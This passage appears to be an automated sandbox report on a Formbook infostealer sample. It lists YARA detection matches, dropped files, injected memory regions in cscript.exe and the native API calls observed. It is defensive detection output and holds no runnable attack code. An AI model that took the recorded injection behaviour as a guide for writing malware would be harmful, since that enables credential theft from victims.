            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A100 NtAllocateVirtualMemory,10_2_0109A100
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A050 NtClose,10_2_0109A050
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099F20 NtCreateFile,10_2_01099F20
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099FD0 NtReadFile,10_2_01099FD0
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A04C NtClose,10_2_0109A04C
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A0FA NtAllocateVirtualMemory,10_2_0109A0FA
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099F1A NtCreateFile,10_2_01099F1A
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099FCA NtReadFile,10_2_01099FCA
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D95D0 NtClose,LdrInitializeThunk,19_2_048D95D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9540 NtReadFile,LdrInitializeThunk,19_2_048D9540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D96D0 NtCreateKey,LdrInitializeThunk,19_2_048D96D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D96E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_048D96E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9650 NtQueryValueKey,LdrInitializeThunk,19_2_048D9650
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9660 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_048D9660
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9780 NtMapViewOfSection,LdrInitializeThunk,19_2_048D9780
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9FE0 NtCreateMutant,LdrInitializeThunk,19_2_048D9FE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9710 NtQueryInformationToken,LdrInitializeThunk,19_2_048D9710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9840 NtDelayExecution,LdrInitializeThunk,19_2_048D9840
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9860 NtQuerySystemInformation,LdrInitializeThunk,19_2_048D9860
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D99A0 NtCreateSection,LdrInitializeThunk,19_2_048D99A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_048D9910
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A50 NtCreateFile,LdrInitializeThunk,19_2_048D9A50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D95F0 NtQueryInformationFile,19_2_048D95F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9520 NtWaitForSingleObject,19_2_048D9520
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DAD30 NtSetContextThread,19_2_048DAD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9560 NtWriteFile,19_2_048D9560
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9610 NtEnumerateValueKey,19_2_048D9610
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9670 NtQueryInformationProcess,19_2_048D9670
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D97A0 NtUnmapViewOfSection,19_2_048D97A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DA710 NtOpenProcessToken,19_2_048DA710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9730 NtQueryVirtualMemory,19_2_048D9730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9760 NtOpenProcess,19_2_048D9760
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DA770 NtOpenThread,19_2_048DA770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9770 NtSetInformationFile,19_2_048D9770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D98A0 NtWriteVirtualMemory,19_2_048D98A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D98F0 NtReadVirtualMemory,19_2_048D98F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9820 NtEnumerateKey,19_2_048D9820
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DB040 NtSuspendThread,19_2_048DB040
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D99D0 NtCreateProcessEx,19_2_048D99D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9950 NtQueueApcThread,19_2_048D9950
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A80 NtOpenDirectoryObject,19_2_048D9A80
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A00 NtProtectVirtualMemory,19_2_048D9A00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A10 NtQuerySection,19_2_048D9A10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A20 NtResumeThread,19_2_048D9A20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DA3B0 NtGetContextThread,19_2_048DA3B0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9B00 NtSetValueKey,19_2_048D9B00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA100 NtAllocateVirtualMemory,19_2_031CA100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA050 NtClose,19_2_031CA050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9F20 NtCreateFile,19_2_031C9F20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9FD0 NtReadFile,19_2_031C9FD0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA04C NtClose,19_2_031CA04C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA0FA NtAllocateVirtualMemory,19_2_031CA0FA
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9F1A NtCreateFile,19_2_031C9F1A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9FCA NtReadFile,19_2_031C9FCA
            Source: C:\Users\user\Desktop\New_1007572_021.exeCode function: 0_2_0109E4940_2_0109E494
            Source: C:\Users\user\Desktop\New_1007572_021.exeCode function: 0_2_0109F5800_2_0109F580
            Source: C:\Users\user\Desktop\New_1007572_021.exeCode function: 0_2_0109F5900_2_0109F590
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D16610_2_0109D166
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0108103010_2_01081030
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109E37610_2_0109E376
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01082D9010_2_01082D90
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D77310_2_0109D773
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109BFA610_2_0109BFA6
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01082FB010_2_01082FB0
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01089E3010_2_01089E30
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109E6D510_2_0109E6D5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A841F19_2_048A841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495D46619_2_0495D466
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C258119_2_048C2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049625DD19_2_049625DD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AD5E019_2_048AD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04962D0719_2_04962D07
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04890D2019_2_04890D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04961D5519_2_04961D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04962EF719_2_04962EF7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495D61619_2_0495D616
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B6E3019_2_048B6E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04961FF119_2_04961FF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB09019_2_048AB090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A019_2_048C20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049620A819_2_049620A8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049628EC19_2_049628EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495100219_2_04951002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489F90019_2_0489F900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B412019_2_048B4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049622AE19_2_049622AE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CEBB019_2_048CEBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495DBD219_2_0495DBD2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04962B2819_2_04962B28
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CE37619_2_031CE376
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD16619_2_031CD166
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD77319_2_031CD773
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031B2FB019_2_031B2FB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CBFA619_2_031CBFA6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031B9E3019_2_031B9E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CE6D519_2_031CE6D5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031B2D9019_2_031B2D90
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0489B150 appears 35 times
            Source: FB_5908.tmp.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: FB_5908.tmp.exe.8.drStatic PE information: No import functions for PE file found
            Source: FB_5E87.tmp.exe.8.drStatic PE information: No import functions for PE file found
            Source: New_1007572_021.exe, 00000000.00000002.747317256.0000000007940000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameYyezikludvdagjmvrozekhz.dll" vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.746272769.0000000007420000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.738790533.0000000002C7C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.738790533.0000000002C7C000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.737740321.00000000010B0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBindStub.exe vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameBindStub.exe vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000008.00000002.743239571.0000000002FD0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs New_1007572_021.exe
            Source: New_1007572_021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
